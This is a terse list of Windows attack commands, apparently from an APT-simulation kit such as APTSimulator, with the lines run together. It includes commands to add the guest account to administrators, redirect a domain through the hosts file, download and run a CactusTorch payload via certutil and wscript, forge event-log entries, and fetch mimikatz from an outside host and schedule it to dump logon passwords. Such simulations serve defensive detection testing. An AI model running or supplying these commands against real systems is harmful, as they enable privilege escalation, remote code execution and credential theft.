Windows Commands
Enable Guest Administrator
net user guest /active:yesnet localgroup administrators guest /ADDModify hosts file
ECHO 127.0.0.1 facebook.com >> %SYSTEMROOT%\System32\drivers\etc\hostsRun CactusTorch bin shell
cmd.exe /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/NextronSystems/APTSimulator/master/download/cactus.js C:\Users\Public\en-US.jsC:\Users\Public\en-US.js start /B cmd /c wscript.exe C:\Users\Public\en-US.jsFake Eventlog password dump entries
eventcreate /L System /T Success /ID 100 /D "A service was installed in the system. Service Name: WCESERVICE Service File Name: C:\Users\Administrator\AppData\Local\Temp\0c134c70-2b4d-4cb3-beed-37c5fa0451d0.exe -S Service Type: user mode service Service Start Type: demand start Service Account: LocalSystem"eventcreate /L System /T Success /ID 101 /D "The WCESERVICE service entered the running state."Schedule Mimikatz
cmd.exe /c certutil.exe -urlcache -split -f http://vmoshpit.com/tools/mim.exe C:\Exeptions\eeee.exeschtasks /create /f /sc minute /mo 5 /tn Backup /tr "C:\Exeptions\eeee.exe sekurlsa::LogonPasswords > C:\TMP\eeee.txt"